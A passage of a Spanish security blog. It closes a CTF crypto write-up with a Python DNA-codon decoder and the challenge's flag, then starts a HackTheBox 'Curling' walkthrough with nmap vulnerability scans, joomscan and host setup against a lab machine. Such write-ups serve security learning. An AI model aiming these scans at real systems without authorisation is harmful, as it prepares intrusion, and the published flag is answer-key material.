</span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'TTA'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'9'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">}</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">def decode_dna( string ):</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">pieces = []</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #569cd6; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">for</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> i </span><span style="background-color: #1e1e1e; color: #569cd6; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">in</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> range( 0, len(string), 3 ):</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">piece = string[i:i+3]</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">pieces.append( mapping[piece] )</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #4ec9b0; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">return</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">""</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.join(pieces)</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">string = </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'ACCAGTAAAACGTTGAGACAGTTGAATATCAAACTACACCGAATTCATATGTCACAGCGGCCGACACAGATGATAACA'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #4ec9b0; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">print</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> decode_dna(string)</span></div>
</td></tr>
</tbody></table>
</div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Ejecutamos nuestro script y aquí está la bandera.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none;"><colgroup></colgroup><tbody>
<tr style="height: 0pt;"><td style="background-color: #1e1e1e; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">root@1v4n:~/CTF/b002root19/Crypto/Genetics_GRANTED</span><span style="background-color: #1e1e1e; color: #57a64a; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"># python dna_solver.py</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">flag is dnaCrypto1sAwesome</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Flag</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">`b00t2root{dnaCrypto1sAwesome}</span></div>
</td></tr>
</tbody></table>
</div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">La flag es: </span><span style="background-color: #cccccc; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">b00t2root{dnaCrypto1sAwesome}</span></div>
<br />
<span style="font-family: "calibri" , sans-serif; font-size: 10pt; vertical-align: baseline; white-space: pre-wrap;">Autor: 1v4n a.k.a. @1r0Dm448O</span><span style="font-family: "calibri" , sans-serif; font-size: 10pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="font-family: "calibri" , sans-serif; font-size: 10pt; vertical-align: baseline; white-space: pre-wrap;">Twitter: </span><a href="https://twitter.com/1r0Dm448O" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: "calibri" , sans-serif; font-size: 10pt; vertical-align: baseline; white-space: pre-wrap;">https://twitter.com/1r0Dm448O</span></a><span style="font-family: "calibri" , sans-serif; font-size: 10pt; vertical-align: baseline; white-space: pre-wrap;"> </span>Raul Renaleshttp://www.blogger.com/profile/00004470679001888541noreply@blogger.com0tag:blogger.com,1999:blog-4789894782637921835.post-40509191191865645832019-03-30T22:33:00.000+01:002019-03-31T18:39:11.795+02:00HTB Machine Walkthrough: Curling<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhh8aknuaN8048vfaP77EqcE5auWzPDItdwwaEHugaMpBFWvT5zlyt5XCaEgJCR0owFpm9q5UEX5QEvuah89_-wEet3zAQojginX69fy9sfc_Q-grX89FsxvcUDHwQm8Zjt0QKcoXBSQPw9/s1600/Captura.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="205" data-original-width="654" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhh8aknuaN8048vfaP77EqcE5auWzPDItdwwaEHugaMpBFWvT5zlyt5XCaEgJCR0owFpm9q5UEX5QEvuah89_-wEet3zAQojginX69fy9sfc_Q-grX89FsxvcUDHwQm8Zjt0QKcoXBSQPw9/s640/Captura.PNG" width="640" /></a></div>
<br />
<span style="font-family: "arial"; font-size: 14.6667px; white-space: pre-wrap;">Autor: 1v4n a.k.a. @1r0Dm48O</span><br />
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #333333; font-family: "verdana"; font-size: 12pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">{0x0} </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 12pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Introducción</span></div>
<b id="docs-internal-guid-eb0a274f-7fff-6da6-045f-9c12a596532e" style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Curling es una máquina ubicada en </span><a href="https://www.hackthebox.eu/home/machines/profile/160" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">HackTheBox</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> que debemos vulnerar para conseguir las flags </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">de usuario (user.txt) y root (root.txt) creada por </span><a href="https://www.hackthebox.eu/home/users/profile/29267" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">L4mpje</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> basada en Linux OS, os mostraremos los </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">pasos que hemos dado.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"></span></div>
<a name='more'></a><br />
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="164" src="https://lh6.googleusercontent.com/r-u6uRnwcjbTWsbKrCLcXK1GqRt0_97zuKEz-8DkQlXOhc2AsIRwHfuS1zVobRoQwusaUwj4qwmmTvk6VIKWPXwqRiwXmmHRUXmDfew4ZWhnQjmXUQGfFKNXhLY0MSrcE0CJejWl" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="500" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="290" src="https://lh3.googleusercontent.com/JDf0XYvoKPULGorEzZg65ahEQr82lx7G8K6sEbrrlni9YBnmd5pd9UyJqfm5RMNBmQFgedea2N8AEpyF9LokMklo52CprswBQpLxYlg53wICAcQVjYUX13KPUNn1VOYNkibffhoK" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="491" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 12pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">{0x1} Reconocimiento</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Antes de empezar </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">ifconfig</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> a nuestra máquina de pentesting Kali Linux comprobando la conexión </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">con la VPN privada a través de </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">openvpn --config 1v4n.ovpn </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">asignándose la IP </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">10.10.13.140.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Y comenzamos, descubrimos nuestra dirección IP.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="118" src="https://lh4.googleusercontent.com/g0wF_E6QOZCnxHOIf8c2rty785KthS_27VozbNUXa8Js8Qto8E9i_pIjUofKzCQRewnkUhl56nioxy5A8fEnxg2vJgMdIT6JB18jYaaO41tP3shbFOKvqwIxPz9CS1ArXcE60oMN" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="519" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Y comprobamos que hay conexión con la máquina a vulnerar lanzado un ping:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="150" src="https://lh4.googleusercontent.com/jNwOYP2hKzk3BM85hWo4Me4qBhPGaIIzuNaHGbiDINlqvchGkUMocDNZzJqu9FF9x0o_YPYYVqulXWkx4PnRXPB4tQhMYLMNAkNnJa63z6_hJS0EaZ2Z2LJ7dxj66AAKvEpfACAH" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="516" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 12pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">{0x2} Escaneo</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Realizamos un escaneo de puertos para comprobar los servicios que están abiertos y corriendo </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">en la máquina a vulnerar con </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">nmap -A 10.10.10.150</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span>
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="423" src="https://lh5.googleusercontent.com/X3te_bjpBIgPckhOtPV3rTuy2BPRyk26Wn59OCeW2pdj52G0hVmRztnD4BFYGh0RYzEyWUqC2Wvw17m_l_Ua8aOfSNHN2HMjOkBc-oxF8FNtYRmgWRCWC-kYypR6hxxx2VHf4VkF" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="566" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Observamos puertos abiertos con los correspondientes servicios como el 22 (ssh) y 80 (http). </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Vemos las posibles vulnerabilidades de cada puerto con </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">nmap -sS -sV -p xx 10.10.10.150 --script vuln</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="118" src="https://lh4.googleusercontent.com/fOqaRwr8_fUfwdo3FCGwkH8Qnf9d8tq5RNwq7eZL0LqO-DWixae2ZF1Q-Ghr4877-KeV8mk_s_fuM5KDAI5SnTJ8Cya9pO52GJspAtCfSC4Pve6itMR5Z5F57mla4FhaW9DEKhOl" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="496" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="400" src="https://lh6.googleusercontent.com/lB0RVEs9-8X2QQ1Q3_wn1xeaTgPzxqrRwQvNDk72dHxQ9c-6GhB8smVt1RIxLO-_JEpUKYhTNkYUjjiTh7dyTCM62ciN63OS8aYlQzBlQwRJxtHUrjby8qhS2u2WxuOIk9dVCf7m" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="499" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="129" src="https://lh4.googleusercontent.com/k8xUVNb0zfMpxJv1DiDEjfOidLYyrKdPiqw9GYMubiiWGejxirp_rl4ezDIHxHTBemkUM9cyCcFPfgXNylzfQzcMZBw3eVn-jDUmLsP7Xq1D1bgzSQau4_-4eTzIqzalBE7BQfBP" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="499" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Ejecutando </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">joomscan -u http://10.10.10.150 </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">nos revela que está hospedado un posible de gestor </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">de contenido </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Joomla v. 3.8.8 </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">donde no se identifican vulnerabilidades CVE.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Pasamos a configurar /etc/hosts añadiendo la linea </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">10.10.10.150 curling.htb</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="151" src="https://lh5.googleusercontent.com/NUWTLdDL0v6l0i4J-tzUrumG9gckNooaaLJbdkdWr8f8WBAX4_VUvSWlB_fxqFd0IP_U_M8fnZKTr3Fm87_LZ4A3c5o66JOLG3pt2bdkSvLiroHR1T0vS1Sy5RpR2Z78iIIkBRgs" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="513" /></span></div>
